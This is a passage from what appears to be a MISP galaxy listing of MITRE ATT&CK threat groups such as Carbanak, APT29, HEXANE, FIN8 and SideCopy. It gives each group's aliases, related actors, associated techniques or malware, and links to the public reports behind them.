  • similar: misp-galaxy:360net-threat-actor="摩诃草 - APT-C-09" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="MONSOON - G0042" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132" with estimative-language:likelihood-probability="almost-certain"

Table 7064. Table References

Links

http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf

http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries

https://attack.mitre.org/groups/G0040

https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/

https://securelist.com/the-dropping-elephant-actor/75328/

https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/

https://web.archive.org/web/20180825085952/https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf

https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/

Carbanak - G0008

[Carbanak](https://attack.mitre.org/groups/G0008) is a cybercriminal group that has used [Carbanak](https://attack.mitre.org/software/S0030) malware to target financial institutions since at least 2013. [Carbanak](https://attack.mitre.org/groups/G0008) may be linked to groups tracked separately as [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN7](https://attack.mitre.org/groups/G0046) that have also used [Carbanak](https://attack.mitre.org/software/S0030) malware.(Citation: Kaspersky Carbanak)(Citation: FireEye FIN7 April 2017)(Citation: Europol Cobalt Mar 2018)(Citation: Secureworks GOLD NIAGARA Threat Profile)(Citation: Secureworks GOLD KINGSWOOD Threat Profile)

The tag is: misp-galaxy:mitre-intrusion-set="Carbanak - G0008"

Carbanak - G0008 is also known as:

  • Carbanak

  • Anunak

Carbanak - G0008 has relationships with:

  • similar: misp-galaxy:threat-actor="FIN7" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="Carbanak - APT-C-11" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="FIN7 - G0046" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 7065. Table References

Links

https://attack.mitre.org/groups/G0008

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf

https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

https://www.fox-it.com/en/news/blog/anunak-aka-carbanak-update/

https://www.secureworks.com/research/threat-profiles/gold-kingswood?filter=item-financial-gain

https://www.secureworks.com/research/threat-profiles/gold-niagara

WIRTE - G0090

[WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. [WIRTE](https://attack.mitre.org/groups/G0090) has targeted government, diplomatic, financial, military, legal, and technology organizations in the Middle East and Europe.(Citation: Lab52 WIRTE Apr 2019)(Citation: Kaspersky WIRTE November 2021)

The tag is: misp-galaxy:mitre-intrusion-set="WIRTE - G0090"

WIRTE - G0090 is also known as:

  • WIRTE

Table 7066. Table References

Links

https://attack.mitre.org/groups/G0090

https://lab52.io/blog/wirte-group-attacking-the-middle-east/

https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044

HEXANE - G1001

[HEXANE](https://attack.mitre.org/groups/G1001) is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://attack.mitre.org/groups/G1001)'s TTPs appear similar to [APT33](https://attack.mitre.org/groups/G0064) and [OilRig](https://attack.mitre.org/groups/G0049) but due to differences in victims and tools it is tracked as a separate entity.(Citation: Dragos Hexane)(Citation: Kaspersky Lyceum October 2021)(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)

The tag is: misp-galaxy:mitre-intrusion-set="HEXANE - G1001"

HEXANE - G1001 is also known as:

  • HEXANE

  • Lyceum

  • Siamesekitten

  • Spirlin

Table 7067. Table References

Links

https://attack.mitre.org/groups/G1001

https://dragos.com/resource/hexane/

https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf

https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns

https://www.clearskysec.com/siamesekitten/

https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign

Frankenstein - G0101

[Frankenstein](https://attack.mitre.org/groups/G0101) is a campaign carried out between January and April 2019 by unknown threat actors. The campaign name comes from the actors' ability to piece together several unrelated components.(Citation: Talos Frankenstein June 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Frankenstein - G0101"

Frankenstein - G0101 is also known as:

  • Frankenstein

Table 7068. Table References

Links

https://attack.mitre.org/groups/G0101

https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html

PittyTiger - G0011

[PittyTiger](https://attack.mitre.org/groups/G0011) is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control.(Citation: Bizeul 2014)(Citation: Villeneuve 2014)

The tag is: misp-galaxy:mitre-intrusion-set="PittyTiger - G0011"

PittyTiger - G0011 is also known as:

  • PittyTiger

PittyTiger - G0011 has relationships with:

  • similar: misp-galaxy:threat-actor="APT24" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"

Table 7069. Table References

Links

https://airbus-cyber-security.com/the-eye-of-the-tiger/

https://attack.mitre.org/groups/G0011

https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html

APT16 - G0023

[APT16](https://attack.mitre.org/groups/G0023) is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. (Citation: FireEye EPS Awakens Part 2)

The tag is: misp-galaxy:mitre-intrusion-set="APT16 - G0023"

APT16 - G0023 is also known as:

  • APT16

APT16 - G0023 has relationships with:

  • uses: misp-galaxy:mitre-malware="ELMER - S0064" with estimative-language:likelihood-probability="almost-certain"

Table 7070. Table References

Links

https://attack.mitre.org/groups/G0023

https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

APT17 - G0025

[APT17](https://attack.mitre.org/groups/G0025) is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. (Citation: FireEye APT17)

The tag is: misp-galaxy:mitre-intrusion-set="APT17 - G0025"

APT17 - G0025 is also known as:

  • APT17

  • Deputy Dog

APT17 - G0025 has relationships with:

  • similar: misp-galaxy:threat-actor="APT17" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Winnti Group - G0044" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Axiom - G0001" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Winnti Group - G0044" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Axiom - G0001" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="BLACKCOFFEE - S0069" with estimative-language:likelihood-probability="almost-certain"

Table 7071. Table References

Links

https://attack.mitre.org/groups/G0025

https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf

APT18 - G0026

[APT18](https://attack.mitre.org/groups/G0026) is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical. (Citation: Dell Lateral Movement)

The tag is: misp-galaxy:mitre-intrusion-set="APT18 - G0026"

APT18 - G0026 is also known as:

  • APT18

  • TG-0416

  • Dynamite Panda

  • Threat Group-0416

APT18 - G0026 has relationships with:

  • similar: misp-galaxy:threat-actor="SAMURAI PANDA" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT4" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT18" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1107" with estimative-language:likelihood-probability="almost-certain"

Table 7072. Table References

Links

http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/

https://attack.mitre.org/groups/G0026

https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop

https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop

APT29 - G0016

[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia’s Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021)

In April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Unit 42 SolarStorm December 2020)

The tag is: misp-galaxy:mitre-intrusion-set="APT29 - G0016"

APT29 - G0016 is also known as:

  • APT29

  • IRON RITUAL

  • IRON HEMLOCK

  • NobleBaron

  • Dark Halo

  • StellarParticle

  • NOBELIUM

  • UNC2452

  • YTTRIUM

  • The Dukes

  • Cozy Bear

  • CozyDuke

  • SolarStorm

  • Blue Kitsune

  • UNC3524

APT29 - G0016 has relationships with:

  • similar: misp-galaxy:threat-actor="APT29" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088" with estimative-language:likelihood-probability="almost-certain"

Table 7073. Table References

Links

http://www.secureworks.com/research/threat-profiles/iron-hemlock

https://attack.mitre.org/groups/G0016

https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/

https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF

https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/

https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline/

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/

https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services

https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise

https://www.mandiant.com/resources/blog/unc3524-eye-spy-email

https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf

https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf

https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise

https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html

https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html

https://www.secureworks.com/research/threat-profiles/iron-ritual

https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf

https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/

BITTER - G1002

[BITTER](https://attack.mitre.org/groups/G1002) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://attack.mitre.org/groups/G1002) has primarily targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)

The tag is: misp-galaxy:mitre-intrusion-set="BITTER - G1002"

BITTER - G1002 is also known as:

  • BITTER

  • T-APT-17

Table 7074. Table References

Links

https://attack.mitre.org/groups/G1002

https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html

https://www.forcepoint.com/blog/x-labs/bitter-targeted-attack-against-pakistan

Darkhotel - G0012

[Darkhotel](https://attack.mitre.org/groups/G0012) is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group’s name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. [Darkhotel](https://attack.mitre.org/groups/G0012) has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks.(Citation: Kaspersky Darkhotel)(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft Digital Defense FY20 Sept 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Darkhotel - G0012"

Darkhotel - G0012 is also known as:

  • Darkhotel

  • DUBNIUM

Darkhotel - G0012 has relationships with:

  • similar: misp-galaxy:360net-threat-actor="Darkhotel - APT-C-06" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

Table 7075. Table References

Links

https://attack.mitre.org/groups/G0012

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWxPuf

https://securelist.com/darkhotels-attacks-in-2015/71713/

https://www.microsoft.com/security/blog/2016/06/09/reverse-engineering-dubnium-2/

https://www.microsoft.com/security/blog/2016/06/20/reverse-engineering-dubniums-flash-targeting-exploit/

https://www.microsoft.com/security/blog/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/

Evilnum - G0120

[Evilnum](https://attack.mitre.org/groups/G0120) is a financially motivated threat group that has been active since at least 2018.(Citation: ESET EvilNum July 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Evilnum - G0120"

Evilnum - G0120 is also known as:

  • Evilnum

Table 7076. Table References

Links

https://attack.mitre.org/groups/G0120

https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

Molerats - G0021

[Molerats](https://attack.mitre.org/groups/G0021) is an Arabic-speaking, politically-motivated threat group that has been operating since 2012. The group’s victims have primarily been in the Middle East, Europe, and the United States.(Citation: DustySky)(Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)(Citation: Cybereason Molerats Dec 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Molerats - G0021"

Molerats - G0021 is also known as:

  • Molerats

  • Operation Molerats

  • Gaza Cybergang

Molerats - G0021 has relationships with:

  • similar: misp-galaxy:threat-actor="Molerats" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7077. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf

https://attack.mitre.org/groups/G0021

https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/

https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html

admin@338 - G0018

[admin@338](https://attack.mitre.org/groups/G0018) is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as [PoisonIvy](https://attack.mitre.org/software/S0012), as well as some non-public backdoors. (Citation: FireEye admin@338)

The tag is: misp-galaxy:mitre-intrusion-set="admin@338 - G0018"

admin@338 - G0018 is also known as:

  • admin@338

admin@338 - G0018 has relationships with:

  • similar: misp-galaxy:threat-actor="TEMPER PANDA" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"

Table 7078. Table References

Links

https://attack.mitre.org/groups/G0018

https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html

APT19 - G0073

[APT19](https://attack.mitre.org/groups/G0073) is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. (Citation: FireEye APT19) Some analysts track [APT19](https://attack.mitre.org/groups/G0073) and [Deep Panda](https://attack.mitre.org/groups/G0009) as the same group, but it is unclear from open source information if the groups are the same. (Citation: ICIT China’s Espionage Jul 2016) (Citation: FireEye APT Groups) (Citation: Unit 42 C0d0so0 Jan 2016)

The tag is: misp-galaxy:mitre-intrusion-set="APT19 - G0073"

APT19 - G0073 is also known as:

  • APT19

  • Codoso

  • C0d0so0

  • Codoso Team

  • Sunshop Group

Table 7079. Table References

Links

https://attack.mitre.org/groups/G0073

https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/

https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/

https://www.darkreading.com/attacks-breaches/chinese-hacking-group-codoso-team-uses-forbescom-as-watering-hole-/d/d-id/1319059

https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html

https://www.fireeye.com/current-threats/apt-groups.html#apt19

Mofang - G0103

[Mofang](https://attack.mitre.org/groups/G0103) is a likely China-based cyber espionage group, named for its frequent practice of imitating a victim’s infrastructure. This adversary has been observed since at least May 2012 conducting focused attacks against government and critical infrastructure in Myanmar, as well as several other countries and sectors including military, automobile, and weapons industries.(Citation: FOX-IT May 2016 Mofang)

The tag is: misp-galaxy:mitre-intrusion-set="Mofang - G0103"

Mofang - G0103 is also known as:

  • Mofang

Table 7080. Table References

Links

https://attack.mitre.org/groups/G0103

https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf

APT41 - G0096

[APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

The tag is: misp-galaxy:mitre-intrusion-set="APT41 - G0096"

APT41 - G0096 is also known as:

  • APT41

  • Wicked Panda

Table 7081. Table References

Links

https://attack.mitre.org/groups/G0096

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.group-ib.com/blog/colunmtk-apt41/

https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf

LazyScripter - G0140

[LazyScripter](https://attack.mitre.org/groups/G0140) is threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets.(Citation: MalwareBytes LazyScripter Feb 2021)

The tag is: misp-galaxy:mitre-intrusion-set="LazyScripter - G0140"

LazyScripter - G0140 is also known as:

  • LazyScripter

Table 7082. Table References

Links

https://attack.mitre.org/groups/G0140

https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf

Sharpshooter - G0104

Operation [Sharpshooter](https://attack.mitre.org/groups/G0104) is the name of a cyber espionage campaign discovered in October 2018 targeting nuclear, defense, energy, and financial companies. Though overlaps between this adversary and [Lazarus Group](https://attack.mitre.org/groups/G0032) have been noted, definitive links have not been established.(Citation: McAfee Sharpshooter December 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Sharpshooter - G0104"

Sharpshooter - G0104 is also known as:

  • Sharpshooter

Table 7083. Table References

Links

https://attack.mitre.org/groups/G0104

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf

Strider - G0041

[Strider](https://attack.mitre.org/groups/G0041) is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda.(Citation: Symantec Strider Blog)(Citation: Kaspersky ProjectSauron Blog)

The tag is: misp-galaxy:mitre-intrusion-set="Strider - G0041"

Strider - G0041 is also known as:

  • Strider

  • ProjectSauron

Strider - G0041 has relationships with:

  • similar: misp-galaxy:360net-threat-actor="索伦之眼 - APT-C-16" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="ProjectSauron" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="Remsec - S0125" with estimative-language:likelihood-probability="almost-certain"

Table 7084. Table References

Links

http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets

https://attack.mitre.org/groups/G0041

https://securelist.com/faq-the-projectsauron-apt/75533/

https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf

DarkVishnya - G0105

[DarkVishnya](https://attack.mitre.org/groups/G0105) is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region.(Citation: Securelist DarkVishnya Dec 2018)

The tag is: misp-galaxy:mitre-intrusion-set="DarkVishnya - G0105"

DarkVishnya - G0105 is also known as:

  • DarkVishnya

Table 7085. Table References

Links

https://attack.mitre.org/groups/G0105

https://securelist.com/darkvishnya/89169/

POLONIUM - G1005

[POLONIUM](https://attack.mitre.org/groups/G1005) is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess [POLONIUM](https://attack.mitre.org/groups/G1005) has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.(Citation: Microsoft POLONIUM June 2022)

The tag is: misp-galaxy:mitre-intrusion-set="POLONIUM - G1005"

POLONIUM - G1005 is also known as:

  • POLONIUM

Table 7086. Table References

Links

https://attack.mitre.org/groups/G1005

https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/

Taidoor - G0015

[Taidoor](https://attack.mitre.org/groups/G0015) has been deprecated, as the only technique it was linked to was deprecated in ATT&CK v7.

The tag is: misp-galaxy:mitre-intrusion-set="Taidoor - G0015"

Taidoor - G0015 is also known as:

  • Taidoor

Taidoor - G0015 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"

Table 7087. Table References

Links

https://attack.mitre.org/groups/G0015

FIN8 - G0061

[FIN8](https://attack.mitre.org/groups/G0061) is a financially motivated threat group that has been active since at least January 2016, and known for targeting organizations in the hospitality, retail, entertainment, insurance, technology, chemical, and financial sectors. In June 2021, security researchers detected [FIN8](https://attack.mitre.org/groups/G0061) switching from targeting point-of-sale (POS) devices to distributing a number of ransomware variants.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye Fin8 May 2016)(Citation: Bitdefender Sardonic Aug 2021)(Citation: Symantec FIN8 Jul 2023)

The tag is: misp-galaxy:mitre-intrusion-set="FIN8 - G0061"

FIN8 - G0061 is also known as:

  • FIN8

  • Syssphinx

FIN8 - G0061 has relationships with:

  • similar: misp-galaxy:threat-actor="FIN8" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Admin Shares - T1077" with estimative-language:likelihood-probability="almost-certain"

Table 7088. Table References

Links

https://attack.mitre.org/groups/G0061

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor

https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html

https://www.bitdefender.com/files/News/CaseStudies/study/401/Bitdefender-PR-Whitepaper-FIN8-creat5619-en-EN.pdf

https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html

Rocke - G0106

[Rocke](https://attack.mitre.org/groups/G0106) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://attack.mitre.org/groups/G0106) comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between [Rocke](https://attack.mitre.org/groups/G0106) and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Rocke - G0106"

Rocke - G0106 is also known as:

  • Rocke

Table 7089. Table References

Links

https://attack.mitre.org/groups/G0106

https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html

DragonOK - G0017

[DragonOK](https://attack.mitre.org/groups/G0017) is a threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, [DragonOK](https://attack.mitre.org/groups/G0017) is thought to have a direct or indirect relationship with the threat group [Moafee](https://attack.mitre.org/groups/G0002). (Citation: Operation Quantum Entanglement) It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT. (Citation: New DragonOK)

The tag is: misp-galaxy:mitre-intrusion-set="DragonOK - G0017"

DragonOK - G0017 is also known as:

  • DragonOK

DragonOK - G0017 has relationships with:

  • similar: misp-galaxy:threat-actor="DragonOK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Moafee - G0002" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"

Table 7090. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/

https://attack.mitre.org/groups/G0017

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf

Orangeworm - G0071

[Orangeworm](https://attack.mitre.org/groups/G0071) is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage.(Citation: Symantec Orangeworm April 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Orangeworm - G0071"

Orangeworm - G0071 is also known as:

  • Orangeworm

Table 7091. Table References

Links

https://attack.mitre.org/groups/G0071

https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia

Whitefly - G0107

[Whitefly](https://attack.mitre.org/groups/G0107) is a cyber espionage group that has been operating since at least 2017. The group has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information. The group has been linked to an attack against Singapore’s largest public health organization, SingHealth.(Citation: Symantec Whitefly March 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Whitefly - G0107"

Whitefly - G0107 is also known as:

  • Whitefly

Table 7092. Table References

Links

https://attack.mitre.org/groups/G0107

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore

SideCopy - G1008

[SideCopy](https://attack.mitre.org/groups/G1008) is a Pakistani threat group that has primarily targeted South Asian countries, including Indian and Afghani government personnel, since at least 2019. [SideCopy](https://attack.mitre.org/groups/G1008)'s name comes from its infection chain that tries to mimic that of [Sidewinder](https://attack.mitre.org/groups/G0121), a suspected Indian threat group.(Citation: MalwareBytes SideCopy Dec 2021)

The tag is: misp-galaxy:mitre-intrusion-set="SideCopy - G1008"

SideCopy - G1008 is also known as:

  • SideCopy

Table 7093. Table References

Links

https://attack.mitre.org/groups/G1008

https://www.malwarebytes.com/blog/news/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure

Naikon - G0019

